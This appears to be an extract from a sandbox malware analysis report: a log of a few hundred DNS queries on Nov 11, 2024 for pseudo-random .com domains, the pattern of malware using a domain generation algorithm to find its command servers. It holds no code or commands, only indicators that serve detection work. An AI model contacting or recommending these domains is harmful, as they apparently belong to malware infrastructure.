                                                                                                                                                                                                          Nov 11, 2024 18:24:10.027131081 CET192.168.2.81.1.1.10xd7d8Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.029359102 CET192.168.2.81.1.1.10xf89fStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.031450033 CET192.168.2.81.1.1.10x5c85Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.032654047 CET192.168.2.81.1.1.10x49f5Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.033576965 CET192.168.2.81.1.1.10x5146Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.034827948 CET192.168.2.81.1.1.10xa30eStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.037971020 CET192.168.2.81.1.1.10x3ddStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.038901091 CET192.168.2.81.1.1.10x61c6Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.039794922 CET192.168.2.81.1.1.10x390cStandard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.041862965 CET192.168.2.81.1.1.10x756aStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.042838097 CET192.168.2.81.1.1.10x1748Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.043385983 CET192.168.2.81.1.1.10x869aStandard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.059433937 CET192.168.2.81.1.1.10xb0a9Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.062302113 CET192.168.2.81.1.1.10x6d97Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.079761982 CET192.168.2.81.1.1.10x8c4cStandard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.160078049 CET192.168.2.81.1.1.10x5c88Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.170840025 CET192.168.2.81.1.1.10xc16cStandard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.178246975 CET192.168.2.81.1.1.10xd044Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.183435917 CET192.168.2.81.1.1.10x999fStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.191323996 CET192.168.2.81.1.1.10xdb78Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.195502043 CET192.168.2.81.1.1.10x5e53Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.197626114 CET192.168.2.81.1.1.10xc96bStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.202059031 CET192.168.2.81.1.1.10x7f07Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.204164982 CET192.168.2.81.1.1.10x8264Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.205940008 CET192.168.2.81.1.1.10x4ca0Standard query (0)pupycag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.226659060 CET192.168.2.81.1.1.10x2d76Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.227137089 CET192.168.2.81.1.1.10x5269Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.232743979 CET192.168.2.81.1.1.10xf445Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.233437061 CET192.168.2.81.1.1.10x6e53Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.233835936 CET192.168.2.81.1.1.10x85cfStandard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234106064 CET192.168.2.81.1.1.10xd7c1Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234325886 CET192.168.2.81.1.1.10xfb5eStandard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234482050 CET192.168.2.81.1.1.10xad28Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234673977 CET192.168.2.81.1.1.10xafa8Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234822989 CET192.168.2.81.1.1.10x948dStandard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.234982014 CET192.168.2.81.1.1.10x3d5fStandard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.235129118 CET192.168.2.81.1.1.10xec94Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.245656967 CET192.168.2.81.1.1.10x1ce8Standard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.247515917 CET192.168.2.81.1.1.10x3f13Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.248311043 CET192.168.2.81.1.1.10xbec1Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.248584986 CET192.168.2.81.1.1.10x30ceStandard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.248934031 CET192.168.2.81.1.1.10x24adStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.249341011 CET192.168.2.81.1.1.10xd423Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.249929905 CET192.168.2.81.1.1.10x216aStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.250335932 CET192.168.2.81.1.1.10x9dd1Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.251936913 CET192.168.2.81.1.1.10x52deStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.252990961 CET192.168.2.81.1.1.10xc565Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.255171061 CET192.168.2.81.1.1.10x79cStandard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.255377054 CET192.168.2.81.1.1.10x6043Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.256033897 CET192.168.2.81.1.1.10xd70eStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.259828091 CET192.168.2.81.1.1.10x6d2aStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.261086941 CET192.168.2.81.1.1.10x2ba5Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.261765957 CET192.168.2.81.1.1.10x79bbStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.262816906 CET192.168.2.81.1.1.10xb3afStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.263310909 CET192.168.2.81.1.1.10x4ec8Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.265835047 CET192.168.2.81.1.1.10x63efStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.267045975 CET192.168.2.81.1.1.10x4260Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.267687082 CET192.168.2.81.1.1.10x40b5Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.267851114 CET192.168.2.81.1.1.10xe7d9Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.268184900 CET192.168.2.81.1.1.10x830fStandard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.268275023 CET192.168.2.81.1.1.10xd921Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.270035028 CET192.168.2.81.1.1.10x66b4Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.383058071 CET192.168.2.81.1.1.10x95e5Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.104195118 CET192.168.2.81.1.1.10xc533Standard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.104449034 CET192.168.2.81.1.1.10xa9a0Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.104940891 CET192.168.2.81.1.1.10x24d7Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.105664015 CET192.168.2.81.1.1.10x5d61Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.110209942 CET192.168.2.81.1.1.10x999bStandard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.111139059 CET192.168.2.81.1.1.10xf2abStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.111175060 CET192.168.2.81.1.1.10x21ecStandard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.121942043 CET192.168.2.81.1.1.10xa74bStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.123812914 CET192.168.2.81.1.1.10x59e9Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.124394894 CET192.168.2.81.1.1.10x4394Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.124895096 CET192.168.2.81.1.1.10xcd55Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.125478029 CET192.168.2.81.1.1.10xe744Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.125601053 CET192.168.2.81.1.1.10x7ab9Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.126434088 CET192.168.2.81.1.1.10xf2adStandard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.127016068 CET192.168.2.81.1.1.10xff25Standard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.127069950 CET192.168.2.81.1.1.10x9d91Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.127876997 CET192.168.2.81.1.1.10xbab3Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.128525972 CET192.168.2.81.1.1.10x1b01Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.128998995 CET192.168.2.81.1.1.10x5c0cStandard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.128998995 CET192.168.2.81.1.1.10xda95Standard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.129090071 CET192.168.2.81.1.1.10x6246Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.129611015 CET192.168.2.81.1.1.10x4d2aStandard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.129677057 CET192.168.2.81.1.1.10xc16cStandard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.130609989 CET192.168.2.81.1.1.10x6bc2Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.130626917 CET192.168.2.81.1.1.10xbab8Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.131237030 CET192.168.2.81.1.1.10x73e4Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.131393909 CET192.168.2.81.1.1.10x9ea2Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.131867886 CET192.168.2.81.1.1.10x329dStandard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.132154942 CET192.168.2.81.1.1.10x3da4Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.132576942 CET192.168.2.81.1.1.10xd5b3Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.132709026 CET192.168.2.81.1.1.10xb4a8Standard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.133239985 CET192.168.2.81.1.1.10x4704Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.133595943 CET192.168.2.81.1.1.10x489Standard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.134399891 CET192.168.2.81.1.1.10x3e50Standard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.135153055 CET192.168.2.81.1.1.10x1999Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.135339975 CET192.168.2.81.1.1.10xa890Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.139067888 CET192.168.2.81.1.1.10x8b40Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.150268078 CET192.168.2.81.1.1.10x731aStandard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.150614977 CET192.168.2.81.1.1.10xdec6Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.150767088 CET192.168.2.81.1.1.10x4be0Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.151730061 CET192.168.2.81.1.1.10x8cbeStandard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.153321981 CET192.168.2.81.1.1.10x22b8Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.153661966 CET192.168.2.81.1.1.10xe9a3Standard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.154195070 CET192.168.2.81.1.1.10x188Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.163518906 CET192.168.2.81.1.1.10xf7eStandard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.164062023 CET192.168.2.81.1.1.10xf8dfStandard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.174860001 CET192.168.2.81.1.1.10x2708Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.185945988 CET192.168.2.81.1.1.10xe233Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.186157942 CET192.168.2.81.1.1.10xd398Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.186328888 CET192.168.2.81.1.1.10xbc71Standard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.186491013 CET192.168.2.81.1.1.10xde19Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.186698914 CET192.168.2.81.1.1.10x5e59Standard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.187148094 CET192.168.2.81.1.1.10x62b0Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.187494040 CET192.168.2.81.1.1.10x196fStandard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.187668085 CET192.168.2.81.1.1.10xf34eStandard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.191400051 CET192.168.2.81.1.1.10xa4e7Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.217708111 CET192.168.2.81.1.1.10x55c1Standard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.218878031 CET192.168.2.81.1.1.10xa3c9Standard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.223099947 CET192.168.2.81.1.1.10x2c1dStandard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.224149942 CET192.168.2.81.1.1.10xb432Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.227149010 CET192.168.2.81.1.1.10xbd8cStandard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.227485895 CET192.168.2.81.1.1.10x70ebStandard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.231432915 CET192.168.2.81.1.1.10x7fd9Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.231648922 CET192.168.2.81.1.1.10xf84dStandard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.055772066 CET192.168.2.81.1.1.10xa2bbStandard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.082470894 CET192.168.2.81.1.1.10x9421Standard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.886148930 CET192.168.2.81.1.1.10xc09cStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.889928102 CET192.168.2.81.1.1.10x337Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.890916109 CET192.168.2.81.1.1.10x7fddStandard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.892426968 CET192.168.2.81.1.1.10x3c1eStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.894296885 CET192.168.2.81.1.1.10x927fStandard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.896173000 CET192.168.2.81.1.1.10x52a4Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.897440910 CET192.168.2.81.1.1.10xe2a1Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.897984982 CET192.168.2.81.1.1.10xaec0Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.898575068 CET192.168.2.81.1.1.10xcae8Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.898914099 CET192.168.2.81.1.1.10x5d69Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.899432898 CET192.168.2.81.1.1.10x9db5Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.901626110 CET192.168.2.81.1.1.10x718cStandard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.902869940 CET192.168.2.81.1.1.10xa3a4Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.905828953 CET192.168.2.81.1.1.10x988dStandard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.913044930 CET192.168.2.81.1.1.10x67f2Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.915437937 CET192.168.2.81.1.1.10x756fStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.920247078 CET192.168.2.81.1.1.10x84f7Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.926701069 CET192.168.2.81.1.1.10xf2d4Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.929924011 CET192.168.2.81.1.1.10x7e99Standard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.930286884 CET192.168.2.81.1.1.10xfaa1Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.932799101 CET192.168.2.81.1.1.10x23e1Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.937597990 CET192.168.2.81.1.1.10xc236Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.940262079 CET192.168.2.81.1.1.10xa668Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.942461967 CET192.168.2.81.1.1.10x81ddStandard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.943584919 CET192.168.2.81.1.1.10x4430Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.953176975 CET192.168.2.81.1.1.10x9e20Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.956360102 CET192.168.2.81.1.1.10x3e0aStandard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.959099054 CET192.168.2.81.1.1.10xe803Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.961899042 CET192.168.2.81.1.1.10x904eStandard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.962480068 CET192.168.2.81.1.1.10x152eStandard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.963397980 CET192.168.2.81.1.1.10xa175Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.965799093 CET192.168.2.81.1.1.10x2628Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.967516899 CET192.168.2.81.1.1.10x7278Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.968928099 CET192.168.2.81.1.1.10xe898Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.970185041 CET192.168.2.81.1.1.10x4e27Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.970992088 CET192.168.2.81.1.1.10xe4e9Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.972575903 CET192.168.2.81.1.1.10x2ea2Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.003016949 CET192.168.2.81.1.1.10x367cStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.003210068 CET192.168.2.81.1.1.10xc9bfStandard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.006541967 CET192.168.2.81.1.1.10xfd3dStandard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.006719112 CET192.168.2.81.1.1.10x20ecStandard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.006871939 CET192.168.2.81.1.1.10x9133Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007148981 CET192.168.2.81.1.1.10x8e33Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007148981 CET192.168.2.81.1.1.10xd0c2Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007281065 CET192.168.2.81.1.1.10x7775Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007431984 CET192.168.2.81.1.1.10x5895Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.012125969 CET192.168.2.81.1.1.10xfef1Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.019779921 CET192.168.2.81.1.1.10xa15Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.025954962 CET192.168.2.81.1.1.10x2421Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.026531935 CET192.168.2.81.1.1.10x135dStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027014017 CET192.168.2.81.1.1.10x8eb8Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027168989 CET192.168.2.81.1.1.10x9009Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027321100 CET192.168.2.81.1.1.10x46a9Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027467012 CET192.168.2.81.1.1.10x180bStandard query (0)vopyret.comA (IP address)IN (0x0001)false
